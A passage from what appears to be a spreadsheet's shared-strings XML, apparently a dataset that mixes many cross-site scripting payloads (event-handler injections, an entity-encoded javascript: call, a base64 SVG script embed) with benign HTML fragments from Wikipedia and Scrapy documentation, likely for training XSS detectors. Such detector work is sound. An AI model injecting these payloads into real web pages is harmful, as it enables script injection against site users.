    <t xml:space="preserve">    &lt;link rel="index" title="Index" href="genindex.html" /&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;figcaption id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t>&lt;area onmouseup="alert(1)"&gt;test&lt;/area&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Information_value_theory-111"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-Information_value_theory_111-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-Information_value_theory_111-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;slot onkeyup="alert(1)" contenteditable&gt;test&lt;/slot&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Legged_robot" title="Legged robot"&gt;Walking &lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;shadow id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;p ondragover=alert(1) contenteditable&gt;drop here&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;strike id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/strike&gt;</t>
  </si>
  <si>
    <t>&lt;datalist onclick="alert(1)"&gt;test&lt;/datalist&gt;</t>
  </si>
  <si>
    <t>&lt;isindex onpointerover=alert(1)&gt;XSS&lt;/isindex&gt;</t>
  </si>
  <si>
    <t>&lt;rp onbeforecut="alert(1)" contenteditable&gt;test&lt;/rp&gt;</t>
  </si>
  <si>
    <t>&lt;embed onpaste="alert(1)" contenteditable&gt;test&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;section id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/section&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;figure ondragover=alert(1) contenteditable&gt;drop here&lt;/figure&gt;</t>
  </si>
  <si>
    <t>&lt;embed onpointerup=alert(1)&gt;XSS&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;command id=x tabindex=1 onfocus=alert(1)&gt;&lt;/command&gt;</t>
  </si>
  <si>
    <t>&lt;dd&gt;An &lt;a href="/wiki/Intelligent_agent" title="Intelligent agent"&gt;intelligent agent &lt;/a&gt; is a system that perceives its environment and takes actions which maximize its chances of success. The simplest intelligent agents are programs that solve specific problems. More complicated agents include human beings and organizations of human beings (such as &lt;a href="/wiki/Firm" class="mw-redirect" title="Firm"&gt;firms &lt;/a&gt;). The paradigm allows researchers to directly compare or even combine different approaches to isolated problems, by asking which agent is best at maximizing a given "goal function". An agent that solves a specific problem can use any approach that works—some agents are symbolic and logical, some are sub-symbolic &lt;a href="/wiki/Artificial_neural_network" title="Artificial neural network"&gt;artificial neural networks &lt;/a&gt; and others may use new approaches. The paradigm also gives researchers a common language to communicate with other fields—such as &lt;a href="/wiki/Decision_theory" title="Decision theory"&gt;decision theory &lt;/a&gt; and economics—that also use concepts of abstract agents. Building a complete agent requires researchers to address realistic problems of integration; for example, because sensory systems give uncertain information about the environment, planning systems must be able to function in the presence of uncertainty. The intelligent agent paradigm became widely accepted during the 1990s.&lt;sup id="cite_ref-Intelligent_agents_179-0" class="reference"&gt;&lt;a href="#cite_note-Intelligent_agents-179"&gt;&amp;#91;175&amp;#93; &lt;/a&gt; &lt;/sup&gt; &lt;/dd&gt; &lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;param draggable="true" ondragenter="alert(1)"&gt;test&lt;/param&gt;</t>
  </si>
  <si>
    <t>&lt;cite onmouseup="alert(1)"&gt;test&lt;/cite&gt;</t>
  </si>
  <si>
    <t>&lt;u onmousedown="alert(1)"&gt;test&lt;/u&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;tr id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/tr&gt;</t>
  </si>
  <si>
    <t>&lt;fieldset oncontextmenu="alert(1)"&gt;test&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-FOOTNOTENorvig2012-176"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-FOOTNOTENorvig2012_176-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1109%2FAVSS.2017.8078512"&gt;10.1109/AVSS.2017.8078512 &lt;/a&gt;. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-1-5386-2939-0" title="Special:BookSources/978-1-5386-2939-0"&gt;&lt;bdi&gt;978-1-5386-2939-0 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Combining+LiDAR+space+clustering+and+convolutional+neural+networks+for+pedestrian+detection&amp;amp;rft.pages=1-6&amp;amp;rft.date=2017&amp;amp;rft_id=info%3Aarxiv%2F1710.06160&amp;amp;rft_id=info%3Adoi%2F10.1109%2FAVSS.2017.8078512&amp;amp;rft.isbn=978-1-5386-2939-0&amp;amp;rft.aulast=Matti&amp;amp;rft.aufirst=D.&amp;amp;rft.au=Ekenel%2C+H.+K.&amp;amp;rft.au=Thiran%2C+J.+P.&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;form&gt;&lt;textarea oninvalid=alert(1) required&gt;&lt;input type=submit&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;font id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/font&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;label id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/label&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Knowledge_representation_and_reasoning" title="Knowledge representation and reasoning"&gt;Knowledge representation &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;address onpointerenter=alert(1)&gt;XSS&lt;/address&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Military </t>
  </si>
  <si>
    <t>&lt;audio autoplay controls onseeking=alert(1)&gt;&lt;source src="validaudio.wav" type="audio/wav"&gt;&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;script&gt;  setTimeout(\\"writetitle()\\",$\_GET\[\]) &lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;div class="section" id="extending-scrapy"&gt;</t>
  </si>
  <si>
    <t>&lt;colgroup onbeforecopy="alert(1)" contenteditable&gt;test&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Artificial moral agents </t>
  </si>
  <si>
    <t>&lt;tfoot onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/tfoot&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;&lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20161118165842/http://fsroundtable.org/cto-corner-artificial-intelligence-use-in-financial-services/"&gt;"CTO Corner: Artificial Intelligence Use in Financial Services – Financial Services Roundtable" &lt;/a&gt;. &lt;i&gt;Financial Services Roundtable &lt;/i&gt;. 2 April 2015. Archived from &lt;a rel="nofollow" class="external text" href="http://fsroundtable.org/cto-corner-artificial-intelligence-use-in-financial-services/"&gt;the original &lt;/a&gt; on 18 November 2016&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;18 November </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Particle_swarm_optimization" title="Particle swarm optimization"&gt;Particle swarm optimization &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>for a wide range of purposes, from data mining to monitoring and automated</t>
  </si>
  <si>
    <t>&lt;sub onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/sub&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=2" title="Edit section: Definitions"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;abbr draggable="true" ondragend="alert(1)"&gt;test&lt;/abbr&gt;</t>
  </si>
  <si>
    <t>&lt;bgsound id=x tabindex=1 onactivate=alert(1)&gt;&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/David_Hume" title="David Hume"&gt;David Hume &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;dt onpointerout=alert(1)&gt;XSS&lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;select onpointerup=alert(1)&gt;XSS&lt;/select&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;wbr ondrop=alert(1) contenteditable&gt;drop here&lt;/wbr&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFHowe1994"&gt;Howe 1994 &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Process_control" title="Process control"&gt;Process control system &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;col onbeforepaste="alert(1)" contenteditable&gt;test&lt;/col&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Type_physicalism" title="Type physicalism"&gt;identity theory &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;h2&gt;Basic concepts&lt;a class="headerlink" href="#basic-concepts" title="Permalink to this headline"&gt;¶&lt;/a&gt;&lt;/h2&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;table ondrop=alert(1) contenteditable&gt;drop here&lt;/table&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=The+Guardian&amp;amp;rft.atitle=What+jobs+will+still+be+around+in+20+years%3F+Read+this+to+prepare+your+future&amp;amp;rft.date=2017-06-26&amp;amp;rft.aulast=Mahdawi&amp;amp;rft.aufirst=Arwa&amp;amp;rft_id=https%3A%2F%2Fwww.theguardian.com%2Fus-news%2F2017%2Fjun%2F26%2Fjobs-future-automation-robots-skills-creative-health&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">          &lt;dd&gt;&lt;a href="/en/1.0/"&gt;1.0&lt;/a&gt;&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Hierarchical_temporal_memory" title="Hierarchical temporal memory"&gt;Hierarchical temporal memory &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;keygen onpointerdown=alert(1)&gt;XSS&lt;/keygen&gt;</t>
  </si>
  <si>
    <t>&lt;abbr onmouseenter="alert(1)"&gt;test&lt;/abbr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-158"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-158"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFMcCorduck2004" class="citation"&gt;&lt;a href="/wiki/Pamela_McCorduck" title="Pamela McCorduck"&gt;McCorduck, Pamela &lt;/a&gt; (2004), &lt;a rel="nofollow" class="external text" href="http://www.pamelamc.com/html/machines_who_think.html"&gt;&lt;i&gt;Machines Who Think &lt;/i&gt; &lt;/a&gt; (2nd ed.), Natick, MA: A. K. Peters, Ltd., &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/1-56881-205-1" title="Special:BookSources/1-56881-205-1"&gt;&lt;bdi&gt;1-56881-205-1 &lt;/bdi&gt; &lt;/a&gt; &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Machines+Who+Think&amp;amp;rft.place=Natick%2C+MA&amp;amp;rft.edition=2nd&amp;amp;rft.pub=A.+K.+Peters%2C+Ltd.&amp;amp;rft.date=2004&amp;amp;rft.isbn=1-56881-205-1&amp;amp;rft.aulast=McCorduck&amp;amp;rft.aufirst=Pamela&amp;amp;rft_id=http%3A%2F%2Fwww.pamelamc.com%2Fhtml%2Fmachines_who_think.html&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;h1 id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/h1&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;track draggable="true" ondragend="alert(1)"&gt;test&lt;/track&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-FOOTNOTEDomingos2015210-207"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-FOOTNOTEDomingos2015210_207-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;body onscroll=alert(1)&gt;&lt;div style=height:1000px&gt;&lt;/div&gt;&lt;div id=x&gt;&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;textarea onauxclick=alert(1)&gt;XSS&lt;/textarea&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-245"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-245"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Network_security" title="Network security"&gt;Network security &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Kevin_Warwick" title="Kevin Warwick"&gt;Kevin Warwick &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Davis, Ernest; Marcus, Gary (24 August 2015). &lt;a rel="nofollow" class="external text" href="https://m.cacm.acm.org/magazines/2015/9/191169-commonsense-reasoning-and-commonsense-knowledge-in-artificial-intelligence/"&gt;"Commonsense reasoning and commonsense knowledge in artificial intelligence" &lt;/a&gt;. &lt;i&gt;Communications of the ACM &lt;/i&gt;. &lt;b&gt;58 &lt;/b&gt; (9): 92–103. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1145%2F2701413"&gt;10.1145/2701413 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Communications+of+the+ACM&amp;amp;rft.atitle=Commonsense+reasoning+and+commonsense+knowledge+in+artificial+intelligence&amp;amp;rft.volume=58&amp;amp;rft.issue=9&amp;amp;rft.pages=92-103&amp;amp;rft.date=2015-08-24&amp;amp;rft_id=info%3Adoi%2F10.1145%2F2701413&amp;amp;rft.aulast=Davis&amp;amp;rft.aufirst=Ernest&amp;amp;rft.au=Marcus%2C+Gary&amp;amp;rft_id=https%3A%2F%2Fm.cacm.acm.org%2Fmagazines%2F2015%2F9%2F191169-commonsense-reasoning-and-commonsense-knowledge-in-artificial-intelligence%2F&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;param onmouseleave="alert(1)"&gt;test&lt;/param&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;General intelligence </t>
  </si>
  <si>
    <t>&lt;ul onpointerout=alert(1)&gt;XSS&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/AI_control_problem" title="AI control problem"&gt;Control problem &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;u onclick="alert(1)"&gt;test&lt;/u&gt;</t>
  </si>
  <si>
    <t>&lt;content onpointerenter=alert(1)&gt;XSS&lt;/content&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-325"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-325"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;abbr onkeypress="alert(1)" contenteditable&gt;test&lt;/abbr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:1%"&gt;&lt;a href="/wiki/Computer_network" title="Computer network"&gt;Networks &lt;/a&gt; &lt;/th&gt;&lt;td class="navbox-list navbox-odd" style="text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;h1 onmouseleave="alert(1)"&gt;test&lt;/h1&gt;</t>
  </si>
  <si>
    <t>&lt;keygen id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/keygen&gt;</t>
  </si>
  <si>
    <t>&lt;progress onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/progress&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;isindex draggable="true" ondragstart="alert(1)"&gt;test&lt;/isindex&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;a onload=alert(1)&gt;&lt;/a&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-1 tocsection-69"&gt;&lt;a href="#In_fiction"&gt;&lt;span class="tocnumber"&gt;10 </t>
  </si>
  <si>
    <t>&lt;s oncut="alert(1)" contenteditable&gt;test&lt;/s&gt;</t>
  </si>
  <si>
    <t>The &lt;a href="/wiki/Intelligent_agent" title="Intelligent agent"&gt;intelligent agent &lt;/a&gt; paradigm:</t>
  </si>
  <si>
    <t>&lt;header onmouseover="alert(1)"&gt;test&lt;/header&gt;</t>
  </si>
  <si>
    <t>&lt;var oncontextmenu="alert(1)"&gt;test&lt;/var&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Graphics_processing_unit" title="Graphics processing unit"&gt;Graphics processing unit &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>}}();</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFMcCorduck2004"&gt;McCorduck 2004 &lt;/a&gt;, pp.&amp;#160;4–5 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;time ondragover=alert(1) contenteditable&gt;drop here&lt;/time&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r935243608"/&gt;&lt;span style="position:relative; top: -2px;"&gt;&lt;a href="/wiki/Paywall" title="closed access publication – behind paywall"&gt;&lt;img alt="closed access" src="//upload.wikimedia.org/wikipedia/commons/thumb/0/0e/Closed_Access_logo_transparent.svg/9px-Closed_Access_logo_transparent.svg.png" decoding="async" width="9" height="14" srcset="//upload.wikimedia.org/wikipedia/commons/thumb/0/0e/Closed_Access_logo_transparent.svg/14px-Closed_Access_logo_transparent.svg.png 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/0/0e/Closed_Access_logo_transparent.svg/18px-Closed_Access_logo_transparent.svg.png 2x" data-file-width="640" data-file-height="1000" /&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Get familiar with some Scrapy common practices.&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;nav onpointerover=alert(1)&gt;XSS&lt;/nav&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;bdi style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/bdi&gt;</t>
  </si>
  <si>
    <t>&lt;IMG """&gt;&lt;SCRIPT&gt;alert("")&lt;/SCRIPT&gt;"\&gt;</t>
  </si>
  <si>
    <t>&lt;menuitem onbeforecopy="alert(1)" contenteditable&gt;test&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t>&lt;picture&gt;&lt;source srcset="validimage.png"&gt;&lt;image onloadstart=alert(1)&gt;&lt;/picture&gt;</t>
  </si>
  <si>
    <t>&lt;var id=x tabindex=1 onfocus=alert(1)&gt;&lt;/var&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;div class="visualClear"&gt; &lt;/div&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;h1 draggable="true" ondragend="alert(1)"&gt;test&lt;/h1&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFMcCarthy2007" class="citation web"&gt;&lt;a href="/wiki/John_McCarthy_(computer_scientist)" title="John McCarthy (computer scientist)"&gt;McCarthy, John &lt;/a&gt; (12 November 2007). &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20151118212402/http://www-formal.stanford.edu/jmc/whatisai/whatisai.html"&gt;"What Is Artificial Intelligence?" &lt;/a&gt;. Archived from &lt;a rel="nofollow" class="external text" href="http://www-formal.stanford.edu/jmc/whatisai/whatisai.html"&gt;the original &lt;/a&gt; on 18 November 2015. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=unknown&amp;amp;rft.btitle=What+Is+Artificial+Intelligence%3F&amp;amp;rft.date=2007-11-12&amp;amp;rft.aulast=McCarthy&amp;amp;rft.aufirst=John&amp;amp;rft_id=http%3A%2F%2Fwww-formal.stanford.edu%2Fjmc%2Fwhatisai%2Fwhatisai.html&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;button oncut="alert(1)" contenteditable&gt;test&lt;/button&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;td class="navbox-abovebelow" colspan="3"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Default_reasoning_and_non-monotonic_logic-105"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-Default_reasoning_and_non-monotonic_logic_105-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-Default_reasoning_and_non-monotonic_logic_105-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;tt onmouseup="alert(1)"&gt;test&lt;/tt&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;caption style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/caption&gt;</t>
  </si>
  <si>
    <t>&lt;i onpointerenter=alert(1)&gt;XSS&lt;/i&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1007%2Fs10676-007-9138-2"&gt;10.1007/s10676-007-9138-2 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Ethics+and+Information+Technology&amp;amp;rft.atitle=AI+armageddon+and+the+three+laws+of+robotics&amp;amp;rft.volume=9&amp;amp;rft.issue=2&amp;amp;rft.pages=153-164&amp;amp;rft.date=2007&amp;amp;rft_id=%2F%2Fciteseerx.ist.psu.edu%2Fviewdoc%2Fsummary%3Fdoi%3D10.1.1.85.8904&amp;amp;rft_id=info%3Adoi%2F10.1007%2Fs10676-007-9138-2&amp;amp;rft.aulast=McCauley&amp;amp;rft.aufirst=Lee&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;link rel="license" href="//creativecommons.org/licenses/by-sa/3.0/"/&gt;</t>
  </si>
  <si>
    <t>&lt;EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"&gt;&lt;/EMBED&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFRajani2011" class="citation journal"&gt;Rajani, Sandeep (2011). &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20130118095844/http://www.csjournals.com/IJITKM/PDF%204-1/35.Sandeep%20Rajani.pdf"&gt;"Artificial Intelligence – Man or Machine" &lt;/a&gt; &lt;span class="cs1-format"&gt;(PDF) </t>
  </si>
  <si>
    <t>&lt;title onmouseleave="alert(1)"&gt;test&lt;/title&gt;</t>
  </si>
  <si>
    <t>&lt;img src=x onerror="&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041"&gt;</t>
  </si>
  <si>
    <t>&lt;script onpointerover=alert(1)&gt;XSS&lt;/script&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Robot rights </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;dfn id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/dfn&gt;</t>
  </si>
  <si>
    <t>&lt;summary onpointerleave=alert(1)&gt;XSS&lt;/summary&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=61" title="Edit section: Consciousness"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFNilsson1998"&gt;Nilsson 1998 &lt;/a&gt;, chpt. 21 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;h1 onpointerdown=alert(1)&gt;XSS&lt;/h1&gt;</t>
  </si>
  <si>
    <t>&lt;s draggable="true" ondragenter="alert(1)"&gt;test&lt;/s&gt;</t>
  </si>
  <si>
